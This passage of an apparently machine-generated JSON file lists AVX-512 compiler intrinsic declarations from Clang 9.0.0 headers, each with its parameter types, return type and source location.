"return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_broadcastmb_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlcdintrin.h:22:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_broadcastmb_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlcdintrin.h:28:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_broadcastmw_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlcdintrin.h:34:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask16" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_broadcastmw_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlcdintrin.h:40:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask16" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_conflict_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlcdintrin.h:47:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_conflict_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlcdintrin.h:53:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_conflict_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlcdintrin.h:61:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_conflict_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlcdintrin.h:69:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_conflict_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlcdintrin.h:75:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_conflict_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlcdintrin.h:83:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_conflict_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlcdintrin.h:91:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_conflict_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlcdintrin.h:97:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_conflict_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlcdintrin.h:105:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_conflict_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlcdintrin.h:113:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_conflict_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlcdintrin.h:119:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_conflict_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlcdintrin.h:127:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_lzcnt_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlcdintrin.h:135:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_lzcnt_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlcdintrin.h:141:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_lzcnt_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlcdintrin.h:149:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_lzcnt_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlcdintrin.h:157:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_lzcnt_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlcdintrin.h:163:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_lzcnt_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlcdintrin.h:171:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_lzcnt_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlcdintrin.h:179:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_lzcnt_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlcdintrin.h:185:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_lzcnt_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlcdintrin.h:193:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_lzcnt_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlcdintrin.h:201:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_lzcnt_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlcdintrin.h:207:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_lzcnt_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlcdintrin.h:215:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mullo_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:22:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_mullo_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:27:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_mullo_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:34:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mullo_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:41:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_mullo_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:46:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_mullo_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:53:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_andnot_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:60:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maskz_andnot_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:67:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_mask_andnot_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:74:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_andnot_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:81:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_mask_andnot_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:88:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_andnot_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:95:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm_mask_andnot_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:102:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_andnot_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:109:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_mask_and_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:116:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maskz_and_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:123:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_mask_and_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:130:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_and_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:137:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_mask_and_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:144:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_and_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:151:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm_mask_and_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:158:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_and_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:165:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_mask_xor_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:172:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maskz_xor_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:179:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_mask_xor_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:186:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_xor_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:193:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_mask_xor_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:200:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_xor_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:207:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm_mask_xor_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:214:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_xor_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:221:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_mask_or_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:228:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maskz_or_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:235:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_mask_or_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:242:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_or_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:249:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_mask_or_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:256:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_or_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:263:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm_mask_or_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:270:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_or_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:277:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cvtpd_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:284:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtpd_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:291:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvtpd_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:298:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_cvtpd_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:305:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_cvtpd_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vldqintrin.h:312:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { 